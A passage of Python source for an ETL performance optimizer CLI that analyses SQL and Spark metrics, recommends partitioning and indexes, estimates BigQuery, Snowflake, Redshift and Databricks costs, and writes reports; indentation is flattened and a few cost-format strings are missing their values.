title="Add LIMIT to ORDER BY",
description="ORDER BY without LIMIT sorts entire result set unnecessarily.",
current_issue="ORDER BY present without LIMIT clause",
recommendation="Add LIMIT if only top N rows are needed",
expected_improvement="Significant reduction in sorting overhead for large results",
implementation="Add LIMIT 100 (or appropriate number) after ORDER BY",
priority=4
)
def _recommend_cte_conversion(self) -> OptimizationRecommendation:
return OptimizationRecommendation(
category="query_structure",
severity="medium",
title="Convert Subqueries to CTEs",
description="Subqueries can be harder to optimize and maintain than CTEs.",
current_issue="Subqueries detected in the query",
recommendation="Convert correlated subqueries to CTEs or JOINs",
expected_improvement="Better query plan optimization and readability",
implementation="WITH subquery_name AS (SELECT ...) SELECT ... FROM main_table JOIN subquery_name",
priority=3
)
def _analyze_index_opportunities(self, query_info: SQLQueryInfo) -> List[OptimizationRecommendation]:
"""Identify potential index opportunities"""
recommendations = []
# Columns in WHERE clause are index candidates
where_columns = set()
for condition in query_info.where_conditions:
# Extract column names from conditions
col_pattern = re.compile(r'\b([a-zA-Z_][a-zA-Z0-9_]*)\s*(?:=|>|<|>=|<=|<>|!=|LIKE|IN|BETWEEN)', re.IGNORECASE)
where_columns.update(col_pattern.findall(condition))
if where_columns:
recommendations.append(OptimizationRecommendation(
category="index",
severity="medium",
title="Consider Indexes on Filter Columns",
description="Columns used in WHERE clauses benefit from indexes.",
current_issue=f"Filter columns detected: {', '.join(where_columns)}",
recommendation="Create indexes on frequently filtered columns",
expected_improvement="Orders of magnitude faster for selective queries",
implementation=f"CREATE INDEX idx_name ON table ({', '.join(list(where_columns)[:3])})",
priority=2
))
# JOIN columns are index candidates
join_columns = set()
for join in query_info.joins:
if join.get('condition'):
col_pattern = re.compile(r'\.([a-zA-Z_][a-zA-Z0-9_]*)\s*=', re.IGNORECASE)
join_columns.update(col_pattern.findall(join['condition']))
if join_columns:
recommendations.append(OptimizationRecommendation(
category="index",
severity="high",
title="Index Join Columns",
description="Join columns without indexes cause expensive full table scans.",
current_issue=f"Join columns detected: {', '.join(join_columns)}",
recommendation="Ensure indexes exist on join key columns",
expected_improvement="Dramatic improvement in join performance",
implementation=f"CREATE INDEX idx_join ON table ({list(join_columns)[0]})",
priority=1
))
return recommendations
def _analyze_partition_pruning(self, query_info: SQLQueryInfo, sql: str) -> List[OptimizationRecommendation]:
"""Check for partition pruning opportunities"""
recommendations = []
# Look for date/time columns in WHERE clause
date_pattern = re.compile(
r'\b(date|time|timestamp|created|updated|modified)_?\w*\s*(?:=|>|<|>=|<=|BETWEEN)',
re.IGNORECASE
)
if date_pattern.search(sql):
recommendations.append(OptimizationRecommendation(
category="partition",
severity="medium",
title="Leverage Partition Pruning",
description="Date-based filters can leverage partitioned tables for massive speedups.",
current_issue="Date/time filter detected - ensure table is partitioned",
recommendation="Partition table by date column and ensure filter format matches",
expected_improvement="90%+ reduction in data scanned for time-bounded queries",
implementation="CREATE TABLE ... PARTITION BY RANGE (date_column) or use dynamic partitioning",
priority=2
))
return recommendations
def _analyze_aggregation(self, query_info: SQLQueryInfo) -> List[OptimizationRecommendation]:
"""Analyze aggregation patterns"""
recommendations = []
# High cardinality GROUP BY warning
if len(query_info.group_by) > 3:
recommendations.append(OptimizationRecommendation(
category="aggregation",
severity="medium",
title="High Cardinality GROUP BY",
description="Grouping by many columns increases memory usage and reduces aggregation benefit.",
current_issue=f"GROUP BY with {len(query_info.group_by)} columns detected",
recommendation="Review if all group by columns are necessary",
expected_improvement="Reduced memory and faster aggregation",
implementation="Remove non-essential GROUP BY columns or pre-aggregate",
priority=3
))
# COUNT DISTINCT optimization
if 'COUNT' in query_info.aggregations and query_info.distinct:
recommendations.append(OptimizationRecommendation(
category="aggregation",
severity="medium",
title="Optimize COUNT DISTINCT",
description="COUNT DISTINCT can be expensive for high cardinality columns.",
current_issue="COUNT DISTINCT pattern detected",
recommendation="Consider HyperLogLog approximation for very large datasets",
expected_improvement="Massive speedup with ~2% error tolerance",
implementation="Use APPROX_COUNT_DISTINCT() if available in your warehouse",
priority=3
))
return recommendations
# =============================================================================
# Spark Job Analyzer
# =============================================================================
class SparkJobAnalyzer:
"""Analyze Spark job metrics and provide optimization recommendations"""
def analyze(self, metrics: SparkJobMetrics) -> List[OptimizationRecommendation]:
"""Analyze Spark job metrics"""
recommendations = []
# Check for data skew
if metrics.skew_ratio > 5:
recommendations.append(self._recommend_skew_mitigation(metrics))
# Check for excessive shuffle
shuffle_ratio = metrics.shuffle_write_bytes / max(metrics.input_bytes, 1)
if shuffle_ratio > 1.5:
recommendations.append(self._recommend_reduce_shuffle(metrics, shuffle_ratio))
# Check for GC overhead
gc_ratio = metrics.gc_time_ms / max(metrics.duration_ms, 1)
if gc_ratio > 0.1:
recommendations.append(self._recommend_memory_tuning(metrics, gc_ratio))
# Check for failed tasks
if metrics.failed_tasks > 0:
fail_ratio = metrics.failed_tasks / max(metrics.tasks, 1)
recommendations.append(self._recommend_failure_handling(metrics, fail_ratio))
# Check for speculative execution overhead
if metrics.speculative_tasks > metrics.tasks * 0.1:
recommendations.append(self._recommend_reduce_speculation(metrics))
# Check task count
if metrics.tasks > 10000:
recommendations.append(self._recommend_reduce_tasks(metrics))
elif metrics.tasks < 10 and metrics.input_bytes > 1e9:
recommendations.append(self._recommend_increase_parallelism(metrics))
return recommendations
def _recommend_skew_mitigation(self, metrics: SparkJobMetrics) -> OptimizationRecommendation:
return OptimizationRecommendation(
category="skew",
severity="critical",
title="Severe Data Skew Detected",
description=f"Skew ratio of {metrics.skew_ratio:.1f}x indicates uneven data distribution.",
current_issue=f"Task execution time varies by {metrics.skew_ratio:.1f}x, causing stragglers",
recommendation="Apply skew handling techniques to rebalance data",
expected_improvement="Up to 80% reduction in job time by eliminating stragglers",
implementation="""Options:
1. Salting: Add random prefix to skewed keys
df.withColumn("salted_key", concat(col("key"), lit("_"), (rand() * 10).cast("int")))
2. Broadcast join for small tables:
df1.join(broadcast(df2), "key")
3. Adaptive Query Execution (Spark 3.0+):
spark.conf.set("spark.sql.adaptive.enabled", "true")
spark.conf.set("spark.sql.adaptive.skewJoin.enabled", "true")""",
priority=1
)
def _recommend_reduce_shuffle(self, metrics: SparkJobMetrics, ratio: float) -> OptimizationRecommendation:
return OptimizationRecommendation(
category="shuffle",
severity="high",
title="Excessive Shuffle Data",
description=f"Shuffle writes {ratio:.1f}x the input data size.",
current_issue=f"Shuffle write: {metrics.shuffle_write_bytes / 1e9:.2f} GB vs input: {metrics.input_bytes / 1e9:.2f} GB",
recommendation="Reduce shuffle through partitioning and early aggregation",
expected_improvement="Significant network I/O and storage reduction",
implementation="""Options:
1. Pre-aggregate before shuffle:
df.groupBy("key").agg(sum("value")).repartition("key")
2. Use map-side combining:
df.reduceByKey((a, b) => a + b)
3. Optimize partition count:
spark.conf.set("spark.sql.shuffle.partitions", optimal_count)
4. Use bucketing for repeated joins:
df.write.bucketBy(200, "key").saveAsTable("bucketed_table")""",
priority=1
)
def _recommend_memory_tuning(self, metrics: SparkJobMetrics, gc_ratio: float) -> OptimizationRecommendation:
return OptimizationRecommendation(
category="memory",
severity="high",
title="High GC Overhead",
description=f"GC time is {gc_ratio * 100:.1f}% of total execution time.",
current_issue=f"GC time: {metrics.gc_time_ms / 1000:.1f}s out of {metrics.duration_ms / 1000:.1f}s total",
recommendation="Tune memory settings to reduce garbage collection",
expected_improvement="20-50% faster execution with proper memory config",
implementation="""Memory tuning options:
1. Increase executor memory:
--executor-memory 8g
2. Adjust memory fractions:
spark.memory.fraction=0.6
spark.memory.storageFraction=0.5
3. Use off-heap memory:
spark.memory.offHeap.enabled=true
spark.memory.offHeap.size=4g
4. Reduce cached data:
df.unpersist() when no longer needed
5. Use Kryo serialization:
spark.serializer=org.apache.spark.serializer.KryoSerializer""",
priority=2
)
def _recommend_failure_handling(self, metrics: SparkJobMetrics, fail_ratio: float) -> OptimizationRecommendation:
return OptimizationRecommendation(
category="reliability",
severity="high" if fail_ratio > 0.1 else "medium",
title="Task Failures Detected",
description=f"{metrics.failed_tasks} tasks failed ({fail_ratio * 100:.1f}% failure rate).",
current_issue="Task failures increase job time and resource usage due to retries",
recommendation="Investigate failure causes and add resilience",
expected_improvement="Reduced retries and more predictable job times",
implementation="""Failure handling options:
1. Check executor logs for OOM:
spark.executor.memoryOverhead=2g
2. Handle data issues:
df.filter(col("value").isNotNull())
3. Increase task retries:
spark.task.maxFailures=4
4. Add checkpointing for long jobs:
df.checkpoint()
5. Check for network timeouts:
spark.network.timeout=300s""",
priority=1
)
def _recommend_reduce_speculation(self, metrics: SparkJobMetrics) -> OptimizationRecommendation:
return OptimizationRecommendation(
category="execution",
severity="medium",
title="High Speculative Execution",
description=f"{metrics.speculative_tasks} speculative tasks launched.",
current_issue="Excessive speculation wastes resources and indicates underlying issues",
recommendation="Address root cause of slow tasks instead of speculation",
expected_improvement="Better resource utilization",
implementation="""Options:
1. Disable speculation if not needed:
spark.speculation=false
2. Or tune speculation settings:
spark.speculation.multiplier=1.5
spark.speculation.quantile=0.9
3. Fix underlying skew/memory issues first""",
priority=3
)
def _recommend_reduce_tasks(self, metrics: SparkJobMetrics) -> OptimizationRecommendation:
return OptimizationRecommendation(
category="parallelism",
severity="medium",
title="Too Many Tasks",
description=f"{metrics.tasks} tasks may cause excessive scheduling overhead.",
current_issue="Very high task count increases driver overhead",
recommendation="Reduce partition count for better efficiency",
expected_improvement="Reduced scheduling overhead and driver memory usage",
implementation=f"""
1. Reduce shuffle partitions:
spark.sql.shuffle.partitions={max(200, metrics.tasks // 10)}
2. Coalesce partitions:
df.coalesce({max(200, metrics.tasks // 10)})
3. Use adaptive partitioning (Spark 3.0+):
spark.sql.adaptive.enabled=true""",
priority=3
)
def _recommend_increase_parallelism(self, metrics: SparkJobMetrics) -> OptimizationRecommendation:
recommended_partitions = max(200, int(metrics.input_bytes / (128 * 1e6))) # 128MB per partition
return OptimizationRecommendation(
category="parallelism",
severity="high",
title="Low Parallelism",
description=f"Only {metrics.tasks} tasks for {metrics.input_bytes / 1e9:.2f} GB of data.",
current_issue="Under-utilization of cluster resources",
recommendation="Increase parallelism to better utilize cluster",
expected_improvement="Linear speedup with added parallelism",
implementation=f"""
1. Increase shuffle partitions:
spark.sql.shuffle.partitions={recommended_partitions}
2. Repartition input:
df.repartition({recommended_partitions})
3. Adjust default parallelism:
spark.default.parallelism={recommended_partitions}""",
priority=2
)
# =============================================================================
# Partition Strategy Advisor
# =============================================================================
class PartitionAdvisor:
"""Recommend partitioning strategies based on data characteristics"""
def recommend(self, data_stats: Dict) -> List[PartitionStrategy]:
"""Generate partition recommendations from data statistics"""
recommendations = []
columns = data_stats.get('columns', {})
total_size_bytes = data_stats.get('total_size_bytes', 0)
row_count = data_stats.get('row_count', 0)
for col_name, col_stats in columns.items():
strategy = self._evaluate_column(col_name, col_stats, total_size_bytes, row_count)
if strategy:
recommendations.append(strategy)
# Sort by partition effectiveness
recommendations.sort(key=lambda s: s.partition_size_mb)
return recommendations[:3] # Top 3 recommendations
def _evaluate_column(self, col_name: str, col_stats: Dict,
total_size_bytes: int, row_count: int) -> Optional[PartitionStrategy]:
"""Evaluate a column for partitioning potential"""
cardinality = col_stats.get('cardinality', 0)
data_type = col_stats.get('data_type', 'string')
null_percentage = col_stats.get('null_percentage', 0)
# Skip high-null columns
if null_percentage > 20:
return None
# Date/timestamp columns are ideal for range partitioning
if data_type in ('date', 'timestamp', 'datetime'):
return self._recommend_date_partition(col_name, col_stats, total_size_bytes, row_count)
# Low cardinality columns are good for list partitioning
if cardinality and cardinality <= 100:
return self._recommend_list_partition(col_name, col_stats, total_size_bytes, cardinality)
# Medium cardinality columns can use hash partitioning
if cardinality and 100 < cardinality <= 10000:
return self._recommend_hash_partition(col_name, col_stats, total_size_bytes)
return None
def _recommend_date_partition(self, col_name: str, col_stats: Dict,
total_size_bytes: int, row_count: int) -> PartitionStrategy:
# Estimate daily partition size (assume 365 days of data)
estimated_days = 365
partition_size_mb = (total_size_bytes / estimated_days) / (1024 * 1024)
return PartitionStrategy(
column=col_name,
partition_type="range",
num_partitions=None, # Dynamic based on date range
partition_size_mb=partition_size_mb,
reasoning=f"Date column '{col_name}' is ideal for range partitioning. "
f"Estimated daily partition size: {partition_size_mb:.1f} MB",
implementation=f"""
-- BigQuery
CREATE TABLE table_name
PARTITION BY DATE({col_name})
AS SELECT * FROM source_table;
-- Snowflake
CREATE TABLE table_name
CLUSTER BY (DATE_TRUNC('DAY', {col_name}));
-- Spark/Hive
df.write.partitionBy("{col_name}").parquet("path")
-- PostgreSQL
CREATE TABLE table_name (...)
PARTITION BY RANGE ({col_name});"""
)
def _recommend_list_partition(self, col_name: str, col_stats: Dict,
total_size_bytes: int, cardinality: int) -> PartitionStrategy:
partition_size_mb = (total_size_bytes / cardinality) / (1024 * 1024)
return PartitionStrategy(
column=col_name,
partition_type="list",
num_partitions=cardinality,
partition_size_mb=partition_size_mb,
reasoning=f"Column '{col_name}' has {cardinality} distinct values - ideal for list partitioning. "
f"Estimated partition size: {partition_size_mb:.1f} MB",
implementation=f"""
-- Spark/Hive
df.write.partitionBy("{col_name}").parquet("path")
-- PostgreSQL
CREATE TABLE table_name (...)
PARTITION BY LIST ({col_name});
-- Note: List partitioning works best with stable, low-cardinality values"""
)
def _recommend_hash_partition(self, col_name: str, col_stats: Dict,
total_size_bytes: int) -> PartitionStrategy:
# Target ~128MB partitions
target_partition_size = 128 * 1024 * 1024
num_partitions = max(1, int(total_size_bytes / target_partition_size))
# Round to power of 2 for better distribution
num_partitions = 2 ** int(math.log2(num_partitions) + 0.5)
partition_size_mb = (total_size_bytes / num_partitions) / (1024 * 1024)
return PartitionStrategy(
column=col_name,
partition_type="hash",
num_partitions=num_partitions,
partition_size_mb=partition_size_mb,
reasoning=f"Column '{col_name}' has medium cardinality - hash partitioning provides even distribution. "
f"Recommended {num_partitions} partitions (~{partition_size_mb:.1f} MB each)",
implementation=f"""
-- Spark
df.repartition({num_partitions}, col("{col_name}"))
-- PostgreSQL
CREATE TABLE table_name (...)
PARTITION BY HASH ({col_name});
-- Snowflake (clustering)
ALTER TABLE table_name CLUSTER BY ({col_name});"""
)
# =============================================================================
# Cost Estimator
# =============================================================================
class CostEstimator:
"""Estimate query costs for cloud data warehouses"""
# Pricing (approximate, varies by region and contract)
PRICING = {
'snowflake': {
'compute_per_credit': 2.00, # USD per credit
'credits_per_hour': {
'x-small': 1,
'small': 2,
'medium': 4,
'large': 8,
'x-large': 16,
},
'storage_per_tb_month': 23.00,
},
'bigquery': {
'on_demand_per_tb': 5.00, # USD per TB scanned
'storage_per_tb_month': 20.00,
'streaming_insert_per_gb': 0.01,
},
'redshift': {
'dc2_large_per_hour': 0.25,
'ra3_xlarge_per_hour': 1.086,
'storage_per_gb_month': 0.024,
},
'databricks': {
'dbu_per_hour_sql': 0.22,
'dbu_per_hour_jobs': 0.15,
}
}
def estimate(self, query_info: SQLQueryInfo, warehouse: str,
data_stats: Optional[Dict] = None) -> CostEstimate:
"""Estimate query cost"""
warehouse = warehouse.lower()
if warehouse not in self.PRICING:
raise ValueError(f"Unknown warehouse: {warehouse}. Supported: {list(self.PRICING.keys())}")
# Estimate data scanned
data_scanned_bytes = self._estimate_data_scanned(query_info, data_stats)
data_scanned_tb = data_scanned_bytes / (1024 ** 4)
if warehouse == 'bigquery':
return self._estimate_bigquery(query_info, data_scanned_tb, data_stats)
elif warehouse == 'snowflake':
return self._estimate_snowflake(query_info, data_scanned_tb, data_stats)
elif warehouse == 'redshift':
return self._estimate_redshift(query_info, data_scanned_tb, data_stats)
elif warehouse == 'databricks':
return self._estimate_databricks(query_info, data_scanned_tb, data_stats)
def _estimate_data_scanned(self, query_info: SQLQueryInfo,
data_stats: Optional[Dict]) -> int:
"""Estimate bytes of data that will be scanned"""
if data_stats and 'total_size_bytes' in data_stats:
base_size = data_stats['total_size_bytes']
else:
# Default assumption: 1GB per table
base_size = len(query_info.tables) * 1e9
# Adjust for filters
filter_factor = 1.0
if query_info.where_conditions:
# Assume each filter reduces data by 50% (very rough)
filter_factor = 0.5 ** min(len(query_info.where_conditions), 3)
# Adjust for column projection
if '*' not in query_info.columns and query_info.columns:
# Assume selecting specific columns reduces scan by 50%
filter_factor *= 0.5
return int(base_size * filter_factor)
def _estimate_bigquery(self, query_info: SQLQueryInfo,
data_scanned_tb: float, data_stats: Optional[Dict]) -> CostEstimate:
pricing = self.PRICING['bigquery']
compute_cost = data_scanned_tb * pricing['on_demand_per_tb']
# Minimum billing of 10MB
if data_scanned_tb < 10 / (1024 ** 2):
compute_cost = 10 / (1024 ** 2) * pricing['on_demand_per_tb']
return CostEstimate(
warehouse='BigQuery',
compute_cost=compute_cost,
storage_cost=0, # Storage cost separate
data_transfer_cost=0,
total_cost=compute_cost,
assumptions=[
f"Estimated {data_scanned_tb * 1024:.2f} GB data scanned",
"Using on-demand pricing ($5/TB)",
"Assumes no slot reservations",
"Actual cost depends on partitioning and clustering"
]
)
def _estimate_snowflake(self, query_info: SQLQueryInfo,
data_scanned_tb: float, data_stats: Optional[Dict]) -> CostEstimate:
pricing = self.PRICING['snowflake']
# Estimate warehouse size and time
complexity_to_size = {
'low': 'x-small',
'medium': 'small',
'high': 'medium',
'very_high': 'large'
}
warehouse_size = complexity_to_size.get(query_info.estimated_complexity, 'small')
credits_per_hour = pricing['credits_per_hour'][warehouse_size]
# Estimate runtime (very rough)
estimated_seconds = max(1, data_scanned_tb * 1024 * 10) # 10 seconds per GB
estimated_hours = estimated_seconds / 3600
credits_used = credits_per_hour * estimated_hours
compute_cost = credits_used * pricing['compute_per_credit']
# Minimum 1 minute billing
min_cost = (credits_per_hour / 60) * pricing['compute_per_credit']
compute_cost = max(compute_cost, min_cost)
return CostEstimate(
warehouse='Snowflake',
compute_cost=compute_cost,
storage_cost=0,
data_transfer_cost=0,
total_cost=compute_cost,
assumptions=[
f"Warehouse size: {warehouse_size}",
f"Estimated runtime: {estimated_seconds:.1f} seconds",
f"Credits used: {credits_used:.4f}",
"Minimum 1-minute billing applies",
"Actual cost depends on warehouse auto-suspend settings"
]
)
def _estimate_redshift(self, query_info: SQLQueryInfo,
data_scanned_tb: float, data_stats: Optional[Dict]) -> CostEstimate:
pricing = self.PRICING['redshift']
# Assume RA3 xl node type
hourly_rate = pricing['ra3_xlarge_per_hour']
# Estimate runtime
estimated_seconds = max(1, data_scanned_tb * 1024 * 15) # 15 seconds per GB
estimated_hours = estimated_seconds / 3600
compute_cost = hourly_rate * estimated_hours
return CostEstimate(
warehouse='Redshift',
compute_cost=compute_cost,
storage_cost=0,
data_transfer_cost=0,
total_cost=compute_cost,
assumptions=[
f"Using RA3.xlplus node type",
f"Estimated runtime: {estimated_seconds:.1f} seconds",
"Assumes dedicated cluster (not serverless)",
"Actual cost depends on cluster configuration"
]
)
def _estimate_databricks(self, query_info: SQLQueryInfo,
data_scanned_tb: float, data_stats: Optional[Dict]) -> CostEstimate:
pricing = self.PRICING['databricks']
# Estimate DBUs
estimated_seconds = max(1, data_scanned_tb * 1024 * 12)
estimated_hours = estimated_seconds / 3600
dbu_cost = pricing['dbu_per_hour_sql'] * estimated_hours
return CostEstimate(
warehouse='Databricks',
compute_cost=dbu_cost,
storage_cost=0,
data_transfer_cost=0,
total_cost=dbu_cost,
assumptions=[
f"Using SQL warehouse",
f"Estimated runtime: {estimated_seconds:.1f} seconds",
"DBU rate may vary by workspace tier",
"Does not include underlying cloud costs"
]
)
# =============================================================================
# Report Generator
# =============================================================================
class ReportGenerator:
"""Generate optimization reports"""
def generate_text_report(self, query_info: SQLQueryInfo,
recommendations: List[OptimizationRecommendation],
cost_estimate: Optional[CostEstimate] = None) -> str:
"""Generate a text report"""
lines = []
lines.append("=" * 80)
lines.append("ETL PERFORMANCE OPTIMIZATION REPORT")
lines.append("=" * 80)
lines.append(f"\nGenerated: {datetime.now().isoformat()}")
# Query summary
lines.append("\n" + "-" * 40)
lines.append("QUERY ANALYSIS")
lines.append("-" * 40)
lines.append(f"Query Type: {query_info.query_type}")
lines.append(f"Tables: {', '.join(query_info.tables) or 'None'}")
lines.append(f"Joins: {len(query_info.joins)}")
lines.append(f"Subqueries: {query_info.subqueries}")
lines.append(f"Aggregations: {', '.join(query_info.aggregations) or 'None'}")
lines.append(f"Window Functions: {', '.join(query_info.window_functions) or 'None'}")
lines.append(f"Complexity: {query_info.estimated_complexity.upper()}")
# Cost estimate
if cost_estimate:
lines.append("\n" + "-" * 40)
lines.append("COST ESTIMATE")
lines.append("-" * 40)
lines.append(f"Warehouse: {cost_estimate.warehouse}")
lines.append(f"Estimated Cost: .4f {cost_estimate.currency}")
lines.append("Assumptions:")
for assumption in cost_estimate.assumptions:
lines.append(f" - {assumption}")
# Recommendations
if recommendations:
lines.append("\n" + "-" * 40)
lines.append(f"OPTIMIZATION RECOMMENDATIONS ({len(recommendations)} found)")
lines.append("-" * 40)
for i, rec in enumerate(recommendations, 1):
severity_icon = {
'critical': '🔴',
'high': '🟠',
'medium': '🟡',
'low': '🟢'
}.get(rec.severity, '⚪')
lines.append(f"\n{i}. {severity_icon} [{rec.severity.upper()}] {rec.title}")
lines.append(f" Category: {rec.category}")
lines.append(f" Issue: {rec.current_issue}")
lines.append(f" Recommendation: {rec.recommendation}")
lines.append(f" Expected Improvement: {rec.expected_improvement}")
lines.append(f"\n Implementation:")
for impl_line in rec.implementation.strip().split('\n'):
lines.append(f" {impl_line}")
else:
lines.append("\n✅ No optimization issues detected")
lines.append("\n" + "=" * 80)
return "\n".join(lines)
def generate_json_report(self, query_info: SQLQueryInfo,
recommendations: List[OptimizationRecommendation],
cost_estimate: Optional[CostEstimate] = None) -> Dict:
"""Generate a JSON report"""
return {
"report_type": "etl_performance_optimization",
"generated_at": datetime.now().isoformat(),
"query_analysis": {
"query_type": query_info.query_type,
"tables": query_info.tables,
"joins": query_info.joins,
"subqueries": query_info.subqueries,
"aggregations": query_info.aggregations,
"window_functions": query_info.window_functions,
"complexity": query_info.estimated_complexity
},
"cost_estimate": asdict(cost_estimate) if cost_estimate else None,
"recommendations": [asdict(r) for r in recommendations],
"summary": {
"total_recommendations": len(recommendations),
"critical": sum(1 for r in recommendations if r.severity == "critical"),
"high": sum(1 for r in recommendations if r.severity == "high"),
"medium": sum(1 for r in recommendations if r.severity == "medium"),
"low": sum(1 for r in recommendations if r.severity == "low")
}
}
# =============================================================================
# CLI Commands
# =============================================================================
def cmd_analyze_sql(args):
"""Analyze SQL query for optimization opportunities"""
# Load SQL
sql_path = Path(args.input)
if sql_path.exists():
with open(sql_path, 'r') as f:
sql = f.read()
else:
sql = args.input # Treat as inline SQL
# Parse and analyze
parser = SQLParser()
query_info = parser.parse(sql)
optimizer = SQLOptimizer()
recommendations = optimizer.analyze(query_info, sql)
# Cost estimate if warehouse specified
cost_estimate = None
if args.warehouse:
estimator = CostEstimator()
data_stats = None
if args.stats:
with open(args.stats, 'r') as f:
data_stats = json.load(f)
cost_estimate = estimator.estimate(query_info, args.warehouse, data_stats)
# Generate report
reporter = ReportGenerator()
if args.json:
report = reporter.generate_json_report(query_info, recommendations, cost_estimate)
output = json.dumps(report, indent=2)
else:
output = reporter.generate_text_report(query_info, recommendations, cost_estimate)
if args.output:
with open(args.output, 'w') as f:
f.write(output)
logger.info(f"Report saved to {args.output}")
else:
print(output)
def cmd_analyze_spark(args):
"""Analyze Spark job metrics"""
with open(args.input, 'r') as f:
metrics_data = json.load(f)
# Handle both single job and array of jobs
if isinstance(metrics_data, list):
jobs = metrics_data
else:
jobs = [metrics_data]
all_recommendations = []
analyzer = SparkJobAnalyzer()
for job_data in jobs:
metrics = SparkJobMetrics(
job_id=job_data.get('jobId', 'unknown'),
duration_ms=job_data.get('duration', 0),
stages=job_data.get('numStages', 0),
tasks=job_data.get('numTasks', 0),
shuffle_read_bytes=job_data.get('shuffleReadBytes', 0),
shuffle_write_bytes=job_data.get('shuffleWriteBytes', 0),
input_bytes=job_data.get('inputBytes', 0),
output_bytes=job_data.get('outputBytes', 0),
peak_memory_bytes=job_data.get('peakMemoryBytes', 0),
gc_time_ms=job_data.get('gcTime', 0),
failed_tasks=job_data.get('failedTasks', 0),
speculative_tasks=job_data.get('speculativeTasks', 0),
skew_ratio=job_data.get('skewRatio', 1.0)
)
recommendations = analyzer.analyze(metrics)
all_recommendations.extend(recommendations)
# Deduplicate similar recommendations
unique_recs = []
seen_titles = set()
for rec in all_recommendations:
if rec.title not in seen_titles:
unique_recs.append(rec)
seen_titles.add(rec.title)
# Output
if args.json:
output = json.dumps([asdict(r) for r in unique_recs], indent=2)
else:
lines = []
lines.append("=" * 60)
lines.append("SPARK JOB OPTIMIZATION REPORT")
lines.append("=" * 60)
lines.append(f"\nJobs Analyzed: {len(jobs)}")
lines.append(f"Recommendations: {len(unique_recs)}")
for i, rec in enumerate(unique_recs, 1):
lines.append(f"\n{i}. [{rec.severity.upper()}] {rec.title}")
lines.append(f" {rec.description}")
lines.append(f" Implementation: {rec.implementation[:200]}...")
output = "\n".join(lines)
if args.output:
with open(args.output, 'w') as f:
f.write(output)
else:
print(output)
def cmd_optimize_partition(args):
"""Recommend partition strategies"""
with open(args.input, 'r') as f:
data_stats = json.load(f)
advisor = PartitionAdvisor()
strategies = advisor.recommend(data_stats)
if args.json:
output = json.dumps([asdict(s) for s in strategies], indent=2)
else:
lines = []
lines.append("=" * 60)
lines.append("PARTITION STRATEGY RECOMMENDATIONS")
lines.append("=" * 60)
if not strategies:
lines.append("\nNo partition recommendations based on provided data statistics.")
else:
for i, strategy in enumerate(strategies, 1):
lines.append(f"\n{i}. Partition by: {strategy.column}")
lines.append(f" Type: {strategy.partition_type}")
if strategy.num_partitions:
lines.append(f" Partitions: {strategy.num_partitions}")
lines.append(f" Estimated size: {strategy.partition_size_mb:.1f} MB per partition")
lines.append(f" Reasoning: {strategy.reasoning}")
lines.append(f"\n Implementation:")
for impl_line in strategy.implementation.strip().split('\n'):
lines.append(f" {impl_line}")
output = "\n".join(lines)
if args.output:
with open(args.output, 'w') as f:
f.write(output)
else:
print(output)
def cmd_estimate_cost(args):
"""Estimate query cost"""
# Load SQL
sql_path = Path(args.input)
if sql_path.exists():
with open(sql_path, 'r') as f:
sql = f.read()
else:
sql = args.input
# Parse
parser = SQLParser()
query_info = parser.parse(sql)
# Load data stats if provided
data_stats = None
if args.stats:
with open(args.stats, 'r') as f:
data_stats = json.load(f)
# Estimate cost
estimator = CostEstimator()
cost = estimator.estimate(query_info, args.warehouse, data_stats)
if args.json:
output = json.dumps(asdict(cost), indent=2)
else:
lines = []
lines.append(f"Cost Estimate for {cost.warehouse}")
lines.append("=" * 40)
lines.append(f"Compute Cost: .4f")
lines.append(f"Storage Cost: .4f")
lines.append(f"Data Transfer: .4f")
lines.append("-" * 40)
lines.append(f"Total: .4f {cost.currency}")
lines.append("\nAssumptions:")
for assumption in cost.assumptions:
lines.append(f" - {assumption}")
output = "\n".join(lines)
if args.output:
with open(args.output, 'w') as f:
f.write(output)
else:
print(output)
def cmd_generate_template(args):
"""Generate template files"""
templates = {
'data_stats': {
"total_size_bytes": 10737418240,
"row_count": 10000000,
"columns": {
"id": {
"data_type": "integer",
"cardinality": 10000000,
"null_percentage": 0
},
"created_at": {
"data_type": "timestamp",
"cardinality": 1000000,
"null_percentage": 0
},
"category": {
"data_type": "string",
"cardinality": 50,
"null_percentage": 2
},
"amount": {
"data_type": "float",
"cardinality": 100000,
"null_percentage": 5
}
}
},
'spark_metrics': {
"jobId": "job_12345",
"duration": 300000,
"numStages": 5,
"numTasks": 200,
"shuffleReadBytes": 5368709120,
"shuffleWriteBytes": 2147483648,
"inputBytes": 10737418240,
"outputBytes": 1073741824,
"peakMemoryBytes": 4294967296,
"gcTime": 15000,
"failedTasks": 2,
"speculativeTasks": 5,
"skewRatio": 3.5
}
}
if args.template not in templates:
logger.error(f"Unknown template: {args.template}. Available: {list(templates.keys())}")
sys.exit(1)
output = json.dumps(templates[args.template], indent=2)
if args.output:
with open(args.output, 'w') as f:
f.write(output)
logger.info(f"Template saved to {args.output}")
else:
print(output)
def main():
"""Main entry point"""
parser = argparse.ArgumentParser(
description="ETL Performance Optimizer - Analyze and optimize data pipelines",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
# Analyze SQL query
python etl_performance_optimizer.py analyze-sql query.sql
# Analyze with cost estimate
python etl_performance_optimizer.py analyze-sql query.sql --warehouse bigquery
# Analyze Spark job metrics
python etl_performance_optimizer.py analyze-spark spark-history.json
# Get partition recommendations
python etl_performance_optimizer.py optimize-partition data_stats.json
# Estimate query cost
python etl_performance_optimizer.py estimate-cost query.sql --warehouse snowflake
# Generate template files
python etl_performance_optimizer.py template data_stats --output stats.json
"""
)
parser.add_argument('--verbose', '-v', action='store_true', help='Verbose output')
subparsers = parser.add_subparsers(dest='command', help='Command to run')
# Analyze SQL command
sql_parser = subparsers.add_parser('analyze-sql', help='Analyze SQL query')
sql_parser.add_argument('input', help='SQL file or inline query')
sql_parser.add_argument('--warehouse', '-w', choices=['bigquery', 'snowflake', 'redshift', 'databricks'],
help='Warehouse for cost estimation')
sql_parser.add_argument('--stats', '-s', help='Data statistics JSON file')
sql_parser.add_argument('--output', '-o', help='Output file')
sql_parser.add_argument('--json', action='store_true', help='Output as JSON')
sql_parser.set_defaults(func=cmd_analyze_sql)
# Analyze Spark command
spark_parser = subparsers.add_parser('analyze-spark', help='Analyze Spark job metrics')
spark_parser.add_argument('input', help='Spark metrics JSON file')
spark_parser.add_argument('--output', '-o', help='Output file')
spark_parser.add_argument('--json', action='store_true', help='Output as JSON')
spark_parser.set_defaults(func=cmd_analyze_spark)
# Optimize partition command
partition_parser = subparsers.add_parser('optimize-partition', help='Recommend partition strategies')
